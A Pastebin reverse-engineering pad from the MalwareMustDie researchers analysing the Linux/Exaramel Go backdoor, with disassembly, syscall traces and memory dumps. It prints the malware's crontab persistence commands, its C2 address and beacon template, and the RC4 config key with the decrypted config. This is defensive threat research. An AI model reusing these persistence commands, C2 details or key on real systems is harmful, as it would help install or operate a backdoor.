API tools faq
paste
Advertisement
MalwareMustDie

Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie

MalwareMustDie
Jan 10th, 2020
2,380
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 28.17 KB | None | 0 0
raw download clone embed print report
  1. // Linux/Exaramel (BlackEnergy) - APT ELF malware
  2. // ref: https://www.virustotal.com/gui/file/c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f/details
  3. // binary forms (go-lang with "vendor" installation)
  4. // quick analysis by @unixfreaxjp on radare2 & tsurugi linux seccon
  5. // *) on going stuff is happening, the contents can be changed. #MalwareMustDie!
  6.  
  7. ###############################
  8. # Summary                     #
  9. ###############################
  10.  
  11. 0. Checking, cloning, and initiating run space.
  12. 1. Use both lock (/tmp/.applock) file(unix socket) & futex for protecting a running instance.
  13.    i.e. new bins instance will be exusted due to lock file, dups clones controlled by futex
  14. 2. Aim persistence in cron & systemd startup.
  15. 3. Read encrypted config file, if not exist drop hardcoded crypt one.
  16. 4. Grab information & fills the template for C2 callbacks.
  17. 5. C2 establishment, sending information after read config and start listening.
  18. 6. Host resolving uses libnss; Networking supports system proxy.
  19. 7. Supported to remote command execution.
  20. 8. My opinion: Developer made work, not crooks.
  21. 9. Comments: https://twitter.com/malwaremustd1e/status/1216466744446840837
  22.  
  23. ###############################
  24. # Binary Analysis             #
  25. ###############################
  26.  
  27. 1. Machine: Advanced Micro Devices X86-64
  28. 2. Symbol table '.symtab' contains 7726 entries.
  29. 3. go build ID
  30. 0x00400fd8  3133 3631 3236 3730 3763 6466 3136 6364  136126707cdf16cd
  31. 0x00400fe8  6133 3231 3562 6561 6435 3833 6331 6665  a3215bead583c1fe
  32. 0x00400ff8  3765 3237 3530 3636 48c7 4424 1000 0000  7e275066H.D$....
  33. Notes at offset 0x00000fc8 with length 0x00000038:
  34.   Owner         Data size       Description
  35.   Go            0x00000028      Unknown note type: (0x00000004)
  36. 4. Program Headers:
  37.   Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  38.   PHDR           0x000040 0x0000000000400040 0x0000000000400040 0x000188 0x000188 R   0x1000
  39.   NOTE           0x000fc8 0x0000000000400fc8 0x0000000000400fc8 0x000038 0x000038 R   0x4
  40.   LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x248c80 0x248c80 R E 0x1000
  41.   LOAD           0x249000 0x0000000000649000 0x0000000000649000 0x1ac10f 0x1ac10f R   0x1000
  42.   LOAD           0x3f6000 0x00000000007f6000 0x00000000007f6000 0x02f7e0 0x052400 RW  0x1000
  43.   GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x8
  44.   LOOS+5041580   0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000     0x8
  45. 5. Go syntax v1.8
  46. /usr/lib/go-1.8/lib/time/zoneinfo.zip
  47.  
  48. ###############################
  49. # Static Reversing Analysis   #
  50. ###############################
  51.  
  52. [0x00455940]> pdf
  53. 18: entry0 (int64_t arg_8h);
  54. │           ; arg int64_t arg_8h @ rsp+0x8
  55. │           0x00455940      488d742408     lea rsi, [arg_8h]
  56. │           0x00455945      488b3c24       mov rdi, qword [rsp]
  57. │           0x00455949      488d05100000.  lea rax, [main] ; sym.go.main
  58. │           ; 0x455960 ; "H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$\b\xb8\xe7"
  59. └           0x00455950      ffe0           jmp rax
  60. --- more ---
  61.      :
  62. [0x00455940]> s sym.main.main
  63. [0x00647540]> pd 6
  64.             ; CODE XREF from sym.main.main @ 0x648803
  65.             ;-- sym.go.main.main:
  66. 4808: sym.main.main ();
  67. │ bp: 0 (vars 0, args 0)
  68. │ sp: 105 (vars 105, args 0)
  69. │ rg: 0 (vars 0, args 0)
  70. │           0x00647540      64488b0c25f8.  mov rcx, qword fs:[0xfffffffffffffff8]
  71. │           0x00647549      488d842408fc.  lea rax, [rsp - 0x3f8]
  72. │           0x00647551      483b4110       cmp rax, qword [rcx + 0x10]
  73. │     ┌─< 0x00647555      0f86a3120000   jbe 0x6487fe
  74. │     │    0x0064755b      4881ec780400.  sub rsp, 0x478
  75. │     │    0x00647562      4889ac247004.  mov qword [var_470h], rbp
  76. --- more ---
  77.      :
  78. [0x00647540]> pdsf
  79. ;-- sym.go.main.main:                                                  
  80. 0x00647572 call sym.main.getCurrentDir
  81. 0x006475b4 call sym.runtime.concatstring2
  82. 0x006475d0 call sym.time.Now
  83. 0x00647618 call sym.time.Time.String
  84. 0x0064768a call sym.net.Listen
  85. 0x006476d0 call sym.runtime.makechan
  86. 0x00647727 call fcn.00454c1d fcn.00454c1d
  87. 0x006477ba call sym.os_signal.Notify
  88. 0x006477f9 call sym.runtime.newproc
  89. 0x0064783c call sym.runtime.newobject
  90. 0x0064787c call sym.app_vendor_configur.LoadConfig
  91. 0x00647905 obj.main.defaulthost.str // <====== C2 placeholder var
  92. 0x00647968 call sym.app_vendor_configur.UpdateConfig
  93. 0x00647981 call sym.runtime.makechan
  94. 0x006479a7 call sym.runtime.makechan
  95. 0x006479cd call sym.runtime.makechan
  96. 0x006479ea call sym.runtime.newobject
  97. 0x00647a38 call sym.runtime.newobject
  98. 0x00647a63 call fcn.00454c20 fcn.00454c20
  99. 0x00647af4 call fcn.00454f96 fcn.00454f96
  100. 0x00647b01 call sym.app_vendor_worker.__Worker_.CheckAdapt
  101. 0x00647bbd call sym.app_vendor_worker.__Worker_.GetUser
  102. 0x00647be8 call sym.app_vendor_worker.__Worker_.GetOS
  103. 0x00647c27 call sym.runtime.newproc
  104. 0x00647c51 call fcn.00454bfa fcn.00454bfa
  105. 0x00647c77 call sym.runtime.newselect
  106. 0x00647ca2 call sym.runtime.selectrecv
  107. --- more ---
  108.  
  109. // seek persistency #1
  110.  
  111. chdir("/var/spool/cron"), 1) = 0;
  112. execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null) | grep /test/Exaramel && echo 'true' || echo 'false'"]) = 0;
  113. execve("/usr/bin/crontab", ["crontab", "-l"]) = 0;
  114. execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '*/1 * * * * /test/Exaramel') | crontab -"]) = 0;
  115. execve("/bin/sh", ["/bin/sh", "-c", "(crontab -l 2>/dev/null; echo '@reboot /test/Exaramel') | crontab -"]) = 0;
  116.  
  117. // persistency #2
  118.  
  119. stat("/etc/rc.d/syslogger",..) = 0;
  120. stat("/etc/init/syslogd.conf",..) = 0;
  121. stat("/etc/systemd/system/syslogd.service",..) = 0;
  122. stat("/etc/init.d/syslogd",..) = 0;
  123.  
  124. // check user
  125.  
  126. execve("/bin/sh", ["/bin/sh", "-c", "whoami"]
  127.  
  128. // used for sending data to c2 with hardcoded template:
  129.  
  130. generation=%d&guid=%s&platform=%s&version=%d&whoami=%s%0A
  131.  
  132. // lock runfile
  133.  
  134. "/tmp/.applock"
  135. code: getsockname(3, {sa_family=AF_FILE, path="/tmp/.applock"}, [16])
  136.  
  137. // Code execution environment (is initiated)
  138.  
  139. 0x32676 16 15 os/exec.Command
  140. 0x32686 23 22 os/exec.interfaceEqual
  141. 0x3269d 20 19 os/exec.(*Cmd).envv
  142. 0x326b1 21 20 os/exec.(*Cmd).stdin
  143. 0x326c6 22 21 os/exec.(*Cmd).stdout
  144. 0x326dc 22 21 os/exec.(*Cmd).stderr
  145. 0x326f2 32 31 os/exec.(*Cmd).writerDescriptor
  146. 0x32712 32 31 os/exec.(*Cmd).closeDescriptors
  147. 0x32732 21 20 os/exec.(*Cmd).Start
  148. 0x32747 27 26 os/exec.(*ExitError).Error
  149. 0x32762 20 19 os/exec.(*Cmd).Wait
  150. 0x32776 26 25 os/exec.(*Cmd).StdoutPipe
  151. 0x32790 26 25 os/exec.(*Cmd).StderrPipe
  152. 0x327aa 15 14 os/exec.init.1
  153. 0x327b9 23 22 os/exec.findExecutable
  154. 0x327d0 17 16 os/exec.LookPath
  155. 0x327e1 29 28 os/exec.interfaceEqual.func1
  156. 0x327fe 27 26 os/exec.(*Cmd).stdin.func1
  157. 0x32819 38 37 os/exec.(*Cmd).writerDescriptor.func1
  158. 0x3283f 27 26 os/exec.(*Cmd).Start.func1
  159. 0x3285a 27 26 os/exec.(*Cmd).Start.func2
  160. 0x32875 21 20 os/exec.init.1.func1
  161. 0x3288a 13 12 os/exec.init <====
  162. --- more ---
  163.      :
  164. void sym.os_exec.init(undefined8 param_1, undefined8 param_2, int64_t param_3)
  165. {
  166.     uint64_t *puVar1;
  167.     int64_t extraout_RDX;
  168.     int64_t in_FS_OFFSET;
  169.     undefined8 uStack24;
  170.     undefined8 uStack16;
  171.  
  172.     while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
  173.           *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
  174.     {
  175.         sym.runtime.morestack_noctxt(param_1, param_2, param_3);
  176.         param_3 = extraout_RDX;
  177.     }
  178.     if (1 < (uint8_t)obj.os_exec.initdone.) {
  179.         return;
  180.     }
  181.     if (obj.os_exec.initdone. == (code)0x1) {
  182.         sym.runtime.throwinit();
  183.         do {
  184.             invalidInstructionException();
  185.         } while( true );
  186.     }
  187.     obj.os_exec.initdone. = (code)0x1;
  188.     sym.bytes.init();
  189.     sym.context.init();
  190.     sym.io.init();
  191.     sym.os.init();
  192.     sym.path_filepath.init();
  193.     sym.runtime.init();
  194.     sym.strconv.init();
  195.     sym.strings.init();
  196.     sym.sync.init();
  197.     sym.syscall.init();
  198.     sym.errors.New();
  199.     _obj.os_exec.ErrNotFound = uStack24;
  200.     if (_obj.runtime.writeBarrier == 0) {
  201.         *(undefined8 *)0x826548 = uStack16;
  202.     } else {
  203.         sym.runtime.writebarrierptr();
  204.     }
  205.     sym.os_exec.init.1();
  206.     obj.os_exec.initdone. = (code)0x2;
  207.     return;
  208. }
  209.       :
  210. ; CALL XREF from sym.app_vendor_worker.init @ 0x64623b
  211. ;-- sym.go.os_exec.init:
  212. / 234: sym.os_exec.init ();
  213. | bp: 0 (vars 0, args 0)
  214. | sp: 4 (vars 4, args 0)
  215. | rg: 0 (vars 0, args 0)
  216. |           0x00623e10      mov rcx, qword fs:[0xfffffffffffffff8]
  217. |           0x00623e19      cmp rsp, qword [rcx + 0x10]
  218. |       ,=< 0x00623e1d      jbe 0x623ef0
  219. |       |   0x00623e23      sub rsp, 0x28
  220. ; ---------------------------
  221. |       :   0x0064623b      call sym.os_exec.init                      ;[1]
  222. |       :   0x00646240      call sym.path_filepath.init                ;[2]
  223. |       :   0x00646245      call sym.regexp.init                       ;[3]
  224. |       :   0x0064624a      call sym.runtime.init                      ;[4]
  225. |       :   0x0064624f      call sym.strconv.init                      ;[5]
  226. |       :   0x00646254      call sym.strings.init                      ;[6]
  227. |       :   0x00646259      call sym.syscall.init                      ;[7]
  228. |       :   0x0064625e      call sym.time.init                         ;[8]
  229. |       :   0x00646263      mov byte [obj.app_vendor_worker.initdone.], 2    ; [0x843345:1]=0
  230. |       :   0x0064626a      mov rbp, qword [rsp]
  231. |       :   0x0064626e      add rsp, 8
  232. --- more ---
  233.      :
  234. ; CALL XREF from sym.main.init @ 0x648a74
  235. ;-- sym.go.app_vendor_worker.init:
  236. / 173: sym.app_vendor_worker.init ();
  237. | bp: 0 (vars 0, args 0)
  238. | sp: 0 (vars 0, args 0)
  239. | rg: 0 (vars 0, args 0)
  240. |           0x006461d0      mov rcx, qword fs:[0xfffffffffffffff8]
  241. |           0x006461d9      cmp rsp, qword [rcx + 0x10]
  242. |       ,=< 0x006461dd      jbe 0x646273
  243. |       |   0x006461e3      sub rsp, 8
  244. ; ---------------------------
  245. |       :   0x00648a74      call sym.app_vendor_worker.init            ;[1]
  246. |       :   0x00648a79      call sym.app_vendor_github.com_satori_go_2euuid.init ;[2]
  247. |       :   0x00648a7e      mov byte [obj.main.initdone.], 2           ; [0x843374:1]=0
  248. |       :   0x00648a85      mov rbp, qword [rsp]
  249. |       :   0x00648a89      add rsp, 8
  250. |       :   0x00648a8d      ret
  251. |       :   ; CODE XREF from sym.main.init @ 0x6489fd
  252. |       :   0x00648a8e      call sym.runtime.morestack_noctxt          ;[3]
  253. \       `=< 0x00648a93      jmp sym.main.init
  254.             0x00648a98      int3
  255.             0x00648a99      int3
  256. --- more ---
  257.      :
  258. [0x00648a23 [xAdvc]0 0% 180 Exaramel]> pd $r @ sym.main.init+51 # 0x648a23
  259. |       :   ; CODE XREF from sym.main.init @ 0x648a18
  260. |      ,==< 0x00648a23      7507           jne 0x648a2c
  261. |      |:   0x00648a25      e896e8ddff     call sym.runtime.throwinit  ;[1]
  262. |      |:   0x00648a2a      0f0b           ud2
  263. |      |:   ; CODE XREF from sym.main.init @ 0x648a23
  264. |      `--> 0x00648a2c      c60541a91f00.  mov byte [obj.main.initdone.], 1    ; [0x843374:1]=0
  265. |       :   0x00648a33      e8d837e9ff     call sym.app_vendor_configur.init ;[2]
  266. |       :   0x00648a38      e82310e7ff     call sym.fmt.init           ;[3]
  267. |       :   0x00648a3d      e89e48e9ff     call sym.math_rand.init     ;[4]
  268. |       :   0x00648a42      e8896becff     call sym.net.init           ;[5]
  269. |       :   0x00648a47      e804bcfcff     call sym.app_vendor_network.init ;[6]
  270. |       :   0x00648a4c      e8efdde4ff     call sym.os.init            ;[7]
  271. |       :   0x00648a51      e86ad3fcff     call sym.os_signal.init     ;[8]
  272. |       :   0x00648a56      e8e51ce9ff     call sym.path_filepath.init ;[9]
  273. |       :   0x00648a5b      e8b02cfdff     call sym.app_vendor_scheduler.init ;[?]
  274. |       :   0x00648a60      e8cbd8e1ff     call sym.strconv.init       ;[?]
  275. |       :   0x00648a65      e8b6afe7ff     call sym.strings.init       ;[?]
  276. |       :   0x00648a6a      e80172e3ff     call sym.syscall.init       ;[?]
  277. |       :   0x00648a6f      e83c6ee4ff     call sym.time.init          ;[?]
  278. |       :   0x00648a74      e857d7ffff     call sym.app_vendor_worker.init ;[?]
  279. |       :   0x00648a79      e8f2e6ffff     call sym.app_vendor_github.com_satori_go_2euuid.init ;[?]
  280. |       :   0x00648a7e      c605efa81f00.  mov byte [obj.main.initdone.], 2    ; [0x843374:1]=0
  281. |       :   0x00648a85      488b2c24       mov rbp, qword [rsp]
  282. |       :   0x00648a89      4883c408       add rsp, 8
  283. |       :   0x00648a8d      c3             ret
  284. --- more ---
  285.      :
  286.     if (1 < (uint8_t)obj.main.initdone.) {
  287.         return;
  288.     }
  289.     if (obj.main.initdone. == (code)0x1) {
  290.         sym.runtime.throwinit();
  291.         do {
  292.             invalidInstructionException();
  293.         } while( true );
  294.     }
  295.     obj.main.initdone. = (code)0x1;
  296.     sym.app_vendor_configur.init();
  297.     sym.fmt.init();
  298.     sym.math_rand.init();
  299.     sym.net.init();
  300.     sym.app_vendor_network.init();
  301.     sym.os.init();
  302.     sym.os_signal.init();
  303.     sym.path_filepath.init();
  304.     sym.app_vendor_scheduler.init();
  305.     sym.strconv.init();
  306.     sym.strings.init();
  307.     sym.syscall.init();
  308.     sym.time.init();
  309.     sym.app_vendor_worker.init();
  310.     sym.app_vendor_github.com_satori_go_2euuid.init();
  311.     obj.main.initdone. = (code)0x2;
  312.     return;
  313. }
  314.  
  315. // proxy supported..
  316.  
  317. 0x005f8bc0   42 1298         sym.net_http.ProxyFromEnvironment
  318. 0x005f90e0    6 141          sym.net_http.ProxyURL
  319. 0x005fad00    7 248          sym.net_http.__connectMethod_.proxyAuth
  320. 0x005ffa30   67 1631         sym.net_http.useProxy
  321. 0x00607600    1 28           sym.net_http.ProxyURL.func1
  322. --- more ---
  323.      :
  324. 0x9788ea 36 35 net/http.(*connectMethod).proxyAuth
  325. 0x97961f 18 17 net/http.useProxy
  326. 0x97b757 24 23 net/http.ProxyURL.func1
  327. 0x9dbc43 22 21 net/http.httpProxyEnv
  328. 0x9dbc6d 23 22 net/http.httpsProxyEnv
  329. 0x9dc038 20 19 net/http.noProxyEnv
  330. 0x768d   22 21 net/http.httpProxyEnv
  331. 0x76a3   23 22 net/http.httpsProxyEnv
  332. 0x78de   20 19 net/http.noProxyEnv
  333. 0x2e857  30 29 net/http.ProxyFromEnvironment
  334. 0x2e875  18 17 net/http.ProxyURL
  335. --- more ---
  336.      :
  337. void sym.net_http.__connectMethod_.proxyAuth(undefined8 param_1, undefined8 param_2, int64_t param_3)
  338. {
  339.     uint64_t *puVar1;
  340.     int64_t extraout_RDX;
  341.     int64_t in_FS_OFFSET;
  342.     int64_t *in_stack_00000008;
  343.     undefined8 in_stack_00000010;
  344.     undefined8 in_stack_00000018;
  345.  
  346.     while (puVar1 = (uint64_t *)(*(int64_t *)(in_FS_OFFSET + 0xfffffff8) + 0x10),
  347.           *(BADSPACEBASE **)0x20 < (undefined *)*puVar1 || (undefined *)*(BADSPACEBASE **)0x20 == (undefined *)*puVar1)
  348.     {
  349.         sym.runtime.morestack_noctxt(param_1, param_2, param_3);
  350.         param_3 = extraout_RDX;
  351.     }
  352.     if (*in_stack_00000008 != 0) {
  353.         if (*(int64_t *)(*in_stack_00000008 + 0x20) != 0) {
  354.             sym.net_http.basicAuth();
  355.             sym.runtime.concatstring2();
  356.             return;
  357.         }
  358.         return;
  359.     }
  360.     return;
  361. }
  362. --- more ---
  363.      :
  364.  ; CODE XREF from sym.net_http.__connectMethod_.proxyAuth @ 0x5fadf3
  365.  ; CALL XREFS from sym.net_http.__Transport_.dialConn @ 0x5fe1b1, 0x5ff325
  366.  ;-- sym.go.net_http.__connectMethod_.proxyAuth:
  367. / 248: sym.net_http.__connectMethod_.proxyAuth (int64_t arg_8h, int64_t arg_10h, int64_t arg_18h);
  368. | bp: 0 (vars 0, args 0)
  369. | sp: 10 (vars 7, args 3)
  370. | rg: 0 (vars 0, args 0)
  371. |           0x005fad00      mov rcx, qword fs:[0xfffffffffffffff8]
  372. |           0x005fad09      cmp rsp, qword [rcx + 0x10]
  373. |       ,=< 0x005fad0d      jbe 0x5fadee
  374. |       |   0x005fad13      sub rsp, 0x40
  375. ; ---------------------------
  376. |           0x005fe1b1      call sym.net_http.__connectMethod_.proxyAuth ;[1] M=======
  377. |           0x005fe1b6      mov rax, qword [var_4b0h]
  378. |           0x005fe1bb      mov rcx, qword [var_4b8h]
  379. |           0x005fe1c0      test rax, rax
  380. |       ,=< 0x005fe1c3      jne 0x5ff1c6
  381. |       |   ; CODE XREF from sym.net_http.__Transport_.dialConn @ 0x5ff1fa
  382. |       |   0x005fe1c9      lea rax, [0x0068f0a0]
  383. |       |   0x005fe1d0      mov qword [rsp], rax
  384. |       |   0x005fe1d4      mov rax, qword [var_300h]
  385. |       |   0x005fe1dc      mov qword [var_4b8h], rax
  386. |       |   0x005fe1e1      mov rcx, qword [var_2f8h]
  387. --- more ---
  388.      :
  389. ;-- sym.go.net_http.__Transport_.dialConn:
  390. 0x005fda2d call sym.runtime.newobject
  391. 0x005fda58 int64_t arg1
  392. 0x005fda5c int64_t arg2
  393. 0x005fda6e call fcn.00454fa4 fcn.00454fa4
  394. 0x005fda7b call sym.net_http.__connectMethod_.key
  395. 0x005fda80 int64_t arg2
  396. 0x005fda85 int64_t arg1
  397. 0x005fda97 call fcn.00454f96 fcn.00454f96
  398. 0x005fdab4 call sym.runtime.makechan
  399.    :
  400. 0x005fdb69 call sym.runtime.newobject
  401. 0x005fdbad int64_t arg2
  402. 0x005fdbbf call fcn.00454f96 fcn.00454f96
  403. 0x005fdc8f call sym.net_http_httptrace.ContextClientTrace
  404. 0x005fdd41 call sym.net_http.__connectMethod_.addr ;"tcp ->  <== ==> @@@ MB) \r\t\n as  at  fp= in  is  lr: of  on  pc= sp: sp=!= 0%x\r\n&gt;&lt;'\'"
  405. 0x005fdd7d call rcx
  406. 0x005fde21 call sym.crypto_tls.__Conn_.Handshake
  407. 0x005fde70 call sym.runtime.newproc
  408. 0x005fdeeb call fcn.00454f34 fcn.00454f34
  409. 0x005fdf17 call rbx
  410. 0x005fdf29 call sym.runtime.newobject
  411. 0x005fdf47 call sym.crypto_tls.__Conn_.ConnectionState
  412. --- end ---
  413.  
  414. // drop config
  415.  
  416. openat(AT_FDCWD, "{current dir}config.json", 1|2|0|0, 0666) = 0 ;
  417.  
  418. // write data from below and encrypting...(call: go crypto RC4 library)
  419.  
  420. 0x006f9990  6874 7470 733a 2f2f 3137 362e 3331 2e32  https://176.31.2
  421. 0x006f99a0  3235 2e32 3034 2f61 7069 2f76 3100 0000  25.204/api/v1...
  422.  
  423. // encryption key :
  424.  
  425. in:
  426. [0x006da25a [xAdvc]0 37% 16384 Exaramel]> pd $r @ hit2_0
  427.         ; DATA XREFS from sym.main.main @ 0x647823, 0x6486eb  
  428. │        0x00647787      488d8c249800.  lea rcx, [var_98h]
  429. │        0x0064778f      48898c24b002.  mov qword [var_2b0h], rcx
  430. │        0x00647797      48890424       mov qword [rsp], rax
  431. │        0x0064779b      488d8c247802.  lea rcx, [var_278h]
  432. │        0x006477a3      48894c2408     mov qword [var_8h], rcx
  433. │        0x006477a8      48c744241004.  mov qword [var_10h], 4
  434. │        0x006477b1      48c744241804.  mov qword [var_18h], 4
  435. │        0x006477ba      e8e1defcff     call sym.os_signal.Notify
  436. │        0x006477bf      488b84242001.  mov rax, qword [var_120h]
  437. │        0x006477c7      4889442410     mov qword [var_10h], rax
  438. │        0x006477cc      488b84244001.  mov rax, qword [var_140h]
  439. │        0x006477d4      4889442418     mov qword [var_18h], rax
  440. │        0x006477d9      488b8c244801.  mov rcx, qword [var_148h]
  441. │        0x006477e1      48894c2420     mov qword [var_20h], rcx
  442. │        0x006477e6      c70424180000.  mov dword [rsp], 0x18
  443. │        0x006477ed      488d1534160a.  lea rdx, [0x006e8e28]
  444. │        0x006477f4      4889542408     mov qword [var_8h], rdx
  445. │        0x006477f9      e8729cdeff     call sym.runtime.newproc
  446. │        0x006477fe      488b05c3e71d.  mov rax, qword [0x00825fc8]
  447. │        0x00647805      4885c0         test rax, rax
  448. │  ┌─< 0x00647808      7527           jne 0x647831  
  449. │  │    0x0064780a      48c705b3e71d.  mov qword [0x00825fc8], 0xa
  450. │  │    0x00647815      8b0515bf1f00   mov eax, dword [obj.runtime.writeBarrier]
  451. │  │    0x0064781b      85c0           test eax, eax
  452. │┌──< 0x0064781d      0f85bd0e0000   jne 0x6486e0  
  453. │││    0x00647823      488d05302a09.  lea rax, [hit2_0] ; 0x6da25a ; "s0m3t3rr0r" <======KEY!!
  454. │││    0x0064782a      4889058fe71d.  mov qword [obj.main.key], rax
  455. --- more ---
  456.      :
  457. 0x006da25a [xAdvc]0 37% 16384 Exaramel]> ps
  458. 0x006da25a <nil>runtime: s0m3t3rr0r(++junk)
  459.  
  460. // config
  461.  
  462. ~/test$ r2 config.json
  463.  -- Invert the block bytes using the 'I' key in visual mode
  464. [0x00000000]> px
  465. - offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
  466. 0x00000000  4f65 e400 ded5 2b33 3a61 37b5 1fd8 ffdf  Oe....+3:a7.....
  467. 0x00000010  9f57 b918 6d1e e9b8 8116 057f a636 08e2  .W..m........6..
  468. 0x00000020  4b5a 15c1 57a1 a0e9 1297 49e8 2942 8f78  KZ..W.....I.)B.x
  469. 0x00000030  e267 95ad aead 0846 5074 d17f 9eab e8c6  .g.....FPt......
  470. 0x00000040  7c29 d378 4fd7 5071 c311 53f5 de02 32d0  |).xO.Pq..S...2.
  471. 0x00000050  3e93 45e8 de72 a424 70fb 00e0 f30f 5be0  >.E..r.$p.....[.
  472. 0x00000060  37eb 47a9 d57e ebee 583f 339c 5672 23c4  7.G..~..X?3.Vr#.
  473. 0x00000070  adbf d997 2f99 5a7f 063c 9ba5 7028 15b7  ..../.Z..<..p(..
  474. 0x00000080  3ce6 da90 98ae 8c34 f8b2 0331 a445 d517  <......4...1.E..
  475. 0x00000090  a946 173b c506 c450 0f9e 6a48 d068 b6c8  .F.;...P..jH.h..
  476. 0x000000a0  ffff ffff ffff ffff ffff ffff ffff ffff  ................
  477.  
  478. // the file is encrypted with RC4 with key above, decoded with any flavor:
  479.  
  480. {"Hosts":["https://176.31.225.204/api/v1"],"Proxy":"","Version":"1","Guid":"c65f5f15-2e64-4b41-9c95-59f0d94f5fca","Next":20,"Datetime":"","Timeout":30,"Def":20}
  481.  
  482. // c2
  483.  
  484. 0x6f9990 30 29 https://176.31.225.204/api/v1
  485.  
  486. // you can seek callback OS on:
  487.  
  488. connect(6, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("176.31.225.204")
  489.  
  490. // files enumeration (this happened before C2 networking started per clone)
  491.  
  492. getdents64($SOCKET, {{d_ino=$INODENUM, d_off=$OFFSETNUM,..
  493. loop
  494.  {
  495.    lstat("{$CURRPATH}/{files}"..);
  496.    openat(AT_FDCWD, "{$CURRPATH}/{$DIRS}"..
  497.   }
  498. getdents64($SOCKET, {}, $MMAP);
  499. close($SOCKET);
  500.  
  501. ###############################
  502. # Dynamic Analysis            #
  503. ###############################
  504.  
  505. // works:
  506.  
  507. 00400000-00649000 r-xp 00000000 08:01 397381             /test/Exaramel
  508. 00649000-007f6000 r--p 00249000 08:01 397381             /test/Exaramel
  509. 007f6000-00826000 rw-p 003f6000 08:01 397381             /test/Exaramel
  510. 00826000-00849000 rw-p 00000000 00:00 0
  511. c000000000-c000001000 rw-p 00000000 00:00 0
  512. c41fff8000-c420100000 rw-p 00000000 00:00 0
  513. 7f32836ed000-7f328378d000 rw-p 00000000 00:00 0
  514. 7fff6fc00000-7fff6fc21000 rw-p 00000000 00:00 0          [stack]
  515. 7fff6fdb9000-7fff6fdba000 r-xp 00000000 00:00 0          [vdso]
  516. ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]
  517.  
  518. Exaramel  cwd    DIR                8,1     4096  397369 /test
  519. Exaramel  rtd    DIR                8,1     4096       2 /
  520. Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
  521. Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
  522. Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
  523. Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
  524. Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
  525. Exaramel    4u  0000                0,9        0    1203 anon_inode
  526. Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
  527. Exaramel    6r  FIFO                0,8      0t0    6350 pipe
  528. Exaramel    8r  FIFO                0,8      0t0    6351 pipe
  529.  
  530. Exaramel  cwd    DIR                8,1     4096  397369 /test
  531. Exaramel  rtd    DIR                8,1     4096       2 /
  532. Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
  533. Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
  534. Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
  535. Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
  536. Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
  537. Exaramel    4u  0000                0,9        0    1203 anon_inode
  538. Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
  539. Exaramel    6r  IPv4               6424      0t0     TCP $LOCAL:34573->176.31.225.204:443
  540.  
  541. Exaramel  cwd    DIR                8,1     4096  397369 /test
  542. Exaramel  rtd    DIR                8,1     4096       2 /
  543. Exaramel  txt    REG                8,1  6469139  397381 /test/Exaramel
  544. Exaramel    0u   CHR              136,0      0t0       3 /dev/pts/0
  545. Exaramel    1u   CHR              136,0      0t0       3 /dev/pts/0
  546. Exaramel    2u   CHR              136,0      0t0       3 /dev/pts/0
  547. Exaramel    3u  unix 0xffff88000f2c6480      0t0    6334 /tmp/.applock
  548. Exaramel    4u  0000                0,9        0    1203 anon_inode
  549. Exaramel    5r   CHR                1,9      0t0    1210 /dev/urandom
  550.  
  551. // Live radare2 forensics (before)
  552.  
  553. 0xc4200a6440 2304 /test/Exaramel]> pxx @ obj.runtime.enoptrbss+528867392 # 0xc4200a6440
  554. - offset -     0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF
  555. 0xc4200a6440  Access-Control-Allow-Origin.....Content-Disposition.............
  556. 0xc4200a6480  If-Unmodified-Since.............Proxy-Authenticate..............
  557. 0xc4200a64c0  Proxy-Authorization.............Strict-Transport-Security.......
  558. 0xc4200a6500  Transfer-Encoding...............config.json.....................
  559. 0xc4200a6540  ..m...............m...............m.....................`.. ....
  560. 0xc4200a6580  listen unix /tmp/.applock.......bind: address already in use....
  561. 0xc4200a65c0  App has already started!.......................................
  562.  
  563. // Live radare2 forensics (after)
  564.    :
  565. 0xc42000ed90  Authorization...Content-EncodingContent-LocationContent-Range...Expect..If-MatchLinkMax-
  566. 0xc42000ede8  ForwardsRangeReferer....RefreshTrailer..Retry-After.....Vary100101102200Www-Authenticate
  567. 0xc42000ee40  201202203204205.206207208226300.301302303304305.307308400401402.403404405406407.40840941
  568. 0xc42000ee98  0411412.413414415416417.418422423424426.428429431451500.501502503504505.506507508510511.
  569. 0xc42000eef0  $.m.............j6n.....&.........m..............!n..............bn.....4.........m.....
  570. 0xc42000ef48  ......../test/`........ E. ..../tmp/.applock............................................
  571. 0xc42000efa0  rH..*.E?.[......&.............../dev/urandom............@.. ............................
  572. 0xc42000eff8  ................................Hosts...................Proxy...................Version.
  573. 0xc42000f050  ................Guid....................Next....................Datetime................
  574. 0xc42000f0a8  Timeout.................Def.............................................................
  575.    :
